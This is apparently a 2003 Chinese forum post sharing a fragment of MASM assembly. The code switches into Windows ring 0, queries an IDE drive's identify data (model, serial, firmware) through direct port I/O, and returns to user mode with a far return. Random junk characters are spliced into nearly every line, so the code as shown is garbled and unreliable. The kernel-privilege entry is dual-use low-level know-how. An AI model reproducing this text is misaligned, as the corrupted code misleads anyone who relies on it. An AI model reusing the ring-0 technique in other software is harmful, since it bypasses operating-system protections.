8 T3 ^& R! F( g& }6 T% {7 D, J; 1f6h 如果要检测的设备为该IDE接口的主(MASTER)设备,
# Y3 }! D6 e1 p/ S. z- a; 那么发送 a0,如果为从那么发送 b0: Y% p' w# b }& |8 Y/ L$ w
; 1f7h 如果要检测的设备为 ATA 设备那么发送 ec+ a o& n% p) T
; 如果为 ATAPI 设备那么发送 a1; R9 W0 M1 z: Z6 [" ~- j8 c
;********************************************************************; T: \- S2 R% C! I9 s: _
mov al,0a0h ;Drive 0,Head 07 _( R) J$ J5 K% e j1 _
mov dx,01f6h ;Drive and head port
/ C9 O0 S% f( N6 |% U5 Z# }) N$ H out dx,al4 L7 ]9 `+ Q# z$ h
( r v' r- Q5 @% d9 t% ~$ w! |0 v mov al,0ech 1 K& Z: x4 ^. S! j0 S
inc dx ;Command port
4 l/ M0 v* ~; w/ r- { out dx,al- b c( R% s( V
;********************************************************************
& n& f9 i- M, @* O7 x1 f; 等待硬盘就绪
Y! D& X- U/ o0 Q;********************************************************************9 H9 o" i9 f- `. G
mov ecx,10000h
6 g, r _ B% n) [( s/ ~: w @@:
4 M+ n( r4 a. w% w0 _% \ in al,dx;1f7 (r-status register)8 B; d# s0 [) U/ T- d5 o- U
cmp al,58h;(driver is ready ,and seek complete)8 m$ [ {! s1 V1 C/ k7 U
jz @F0 i. s6 o6 g% X' `- v3 ]7 c, W
loop @B; U% x' |# R$ v* G5 [% z3 Z
jmp _II_TimeOut
! d- |9 R2 f$ V: I4 m& L @@:5 z) ^4 @1 y% B- {. \- e: R3 b7 l. a( p
;********************************************************************0 j0 c. Q) E, s& f, }! L
; 将返回信息读回) h% Z9 F9 f7 \9 b3 n4 N4 g" ]- K
; 注意一定要读满 100h 个字长2 y4 l& M7 b6 e1 J3 ]
;********************************************************************8 ?3 _* w1 ?+ X1 x0 G. I) C* S* u
cld4 d& |1 t/ [$ c3 a
mov edx,01f0h;data port - data comes in and out here1 i" o8 }6 k# E& K# P f
mov edi,ebx' H. {) Q/ a9 _+ `# D" X! _4 {& i. _
mov ecx,0100h
R6 I. Z8 ~4 ^2 N4 R+ y' {. T. I rep insw. w7 t7 ~1 a4 n, {, c$ |/ \
;********************************************************************% {$ T- j: w/ |6 l/ f
; 返回的信息中,型号、序列号、版本号为字形式
9 f8 n5 `9 r# K2 \1 B% d; 需要整理到字符串的形式# E' S" l+ f3 e1 V; \
;********************************************************************
' f/ f i0 I# e `3 |: u- W, _ lea esi,[ebx].sSerialNumber
- N1 o, e A( e+ J) @+ L4 ~3 G mov edi,esi6 r9 P; K# }+ P) |: g
mov ecx,10: k% W$ v$ C# i9 j9 o
@@:
6 u: M5 r- M. {: @2 L Q lodsw
: k3 N( T- ~- o xchg ah,al
1 j. U% y: r! D stosw) h5 B+ E6 A% k5 m8 @% a8 ?
loop @B
& D8 g' `1 R7 l" i2 }0 k4 ^( `* c' E; N4 ~& [1 I
lea esi,[ebx].sFirmwareRev* h6 G2 H# T o4 I
mov edi,esi0 c3 W- }" p/ ?" K* M. E7 X* H
mov ecx,24
+ c4 u) O" w. x' Y0 R' s @@:
" U- L- y/ Z" a9 v" s" F* ] lodsw9 B% c# S. M8 R( h5 V
xchg ah,al* @& J* u1 }0 K$ I
stosw
) l* ?, r) G) Q% ] loop @B2 R% Z8 d: n, `, t
_II_TimeOut:& \- g$ v# J/ ~* h6 m
assume ebx:nothing
- h8 d. Z! S- @- E6 t $ W' C( J8 x ?* }$ Q L
pop esp ;restore ring0 esp9 i( u- G2 E9 w8 J3 l
push offset Ring3
# J) R- o" x* q6 zretf2 X+ Z' s% b0 l& q4 N! C' O
Ring0CodeLen=$-_Ring0Proc, Y# `- n4 C* [, F5 \. Z
. S+ K9 P7 K' iRing3:: _0 M, V" ]' D$ @4 F
invoke GetCurrentThread5 |3 M& S% O' C; o: M% b" ~: M
invoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL
' z, l2 v8 X, g7 X, N p- N
' @ \. l5 H; I: ]! h;invoke VirtualUnlock,Entry,seglen , X7 h; p+ x# i# A
8 P2 j x/ F. R+ w2 W F/ i
call @f
; }$ P( `8 a4 [; f* x; V4 ?: Odb "ZwClose",0. M6 P3 u$ W* A7 _+ V) s
@@:" z+ [- E5 l) ?
push NtdllMod9 {9 S0 u* }2 n6 N' A! w; Q
call GetProcAddress
5 A) P9 O4 c$ I' X+ Epush hSection
' B8 u/ O$ ~$ F3 K# @call eax* c) i& t6 T ~; D( R1 d
mov eax,TRUE( T! h$ D! ~( k' `- L# ^
ret. q* M4 ? `+ \) S6 ?8 h+ F' i
ExecRing0Proc endp
( D9 I% a! @! b2 F' F0 s: B( z: y# _' z- Y: `
main:
2 V5 p4 p) d- l$ _) H2 Q5 \assume fs:nothing7 e6 L/ _, a6 {+ ~
push offset MySEH
- p8 T$ @& k G8 @& {push fs:[0]
: R4 O! i2 P2 f6 w+ d0 K) amov fs:[0],esp/ I5 j7 g/ P2 d
mov OldEsp,esp! o' H/ ~/ j) y+ h
mov ax,ds ;if Win9x?
; d t& ^- G" l& W) `# Utest ax,4
; K7 w* y c/ k5 c3 A' { ejnz Exit1. M8 |' @( @% r0 l4 R( q# G
invoke ExecRing0Proc
' s" C b0 a) ~. I$ V* |
) f* M& n' H2 | x1 \% T.if stIDEINFO.wNumCyls
" x3 O* u7 \9 n) D lea esi,stIDEINFO.sModelNumber8 j) }: |8 H: s0 x T4 ~$ U
mov edi,offset szModelNumber9 D1 G2 Y; m$ q* f8 ^
mov ecx,sizeof stIDEINFO.sModelNumber( n: ?* Z9 ~) i9 A- F7 |! x4 w# I
rep movsb
0 A x- h$ }5 H* p, `# `) Y$ G' E P5 w% ]# m* T& `8 E
lea esi,stIDEINFO.sSerialNumber+ y' B3 i# @) P; Q; k2 y
mov edi,offset szSerialNumber
1 J$ O# q5 O4 Z mov ecx,sizeof stIDEINFO.sSerialNumber
^6 C, ^' a4 }5 X( R2 `$ Z rep movsb$ E7 @/ M# v' M% I
8 j: P0 x- f. v& y8 t5 J lea esi,stIDEINFO.sFirmwareRev, H2 J( k, U# p0 j* w
mov edi,offset szFirmwareRev- c9 A- W& t! A: E& x" ]
mov ecx,sizeof stIDEINFO.sFirmwareRev
! O _1 L1 v0 E6 U rep movsb& Y+ u5 Y n% Q3 }
& d% P6 d D; N7 [
movzx eax,stIDEINFO.wNumCyls; B- v. B9 N1 G8 s. _& ]
movzx ebx,stIDEINFO.wNumHeads
# W7 R* p: h8 |" @ movzx ecx,stIDEINFO.wSectorsPerTrack
( j8 K" s. n' n3 X! o movzx edx,stIDEINFO.wBufferSize8 G7 {, W* @# I2 P# t. R
invoke wsprintf,addr szBuffer,addr szIDEInfo, eax,ebx,ecx,edx, addr szModelNumber, addr szSerialNumber, addr szFirmwareRev% ?' K7 p# A+ _ L4 h' G6 n c
mov eax,offset szBuffer2 `2 y+ P$ Q1 W. N# I: ]! r' v
.else
. I% p" B% g' X/ r1 i8 l ~3 s/ p mov eax,offset szErrInfo. z: ~% g) E) F/ F/ |8 |0 c: ^
.endif
( Y7 G5 E6 G1 {2 }" o@@:
: L+ ^: F- j7 G' x. W8 _& ~invoke MessageBox,NULL,eax,addr szTitle,MB_ICONINFORMATION or MB_OK' p+ B s: C1 y4 _& T2 K! g
Exit1:
( @ i* H/ M! v2 Y Tpop fs:[0]
/ g' t" |( m: y# ?( j6 Yadd esp,46 f O! ?4 b) s& L& [* t
invoke ExitProcess,0. R; `- J0 h T7 g' w. u9 ~" T2 ?
4 u- g, x3 u. X/ D/ F- IMySEH :
! v, U) B4 F; q' j8 nmov esp,OldEsp1 V | Z! h' K, L" Y, ?1 u
pop fs:[0]
) t8 u7 W: a( y8 D- {add esp,4
/ q0 s% F' E4 e9 d2 `, Winvoke ExitProcess,-14 |! K1 t9 t8 ^9 ?9 F# T+ H
end main
5 ~0 A" Q2 c5 X6 y3 A$ u/ m) n8 r S5 W" _- d
[此贴子已经被作者于2003-11-2 18:14:02编辑过]
$ m9 o( c+ h0 ~, ~: x |
|
/1 
IP卡
狗仔卡
发表于 2003-11-2 18:09:00
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2003-11-3 16:22:00
楼主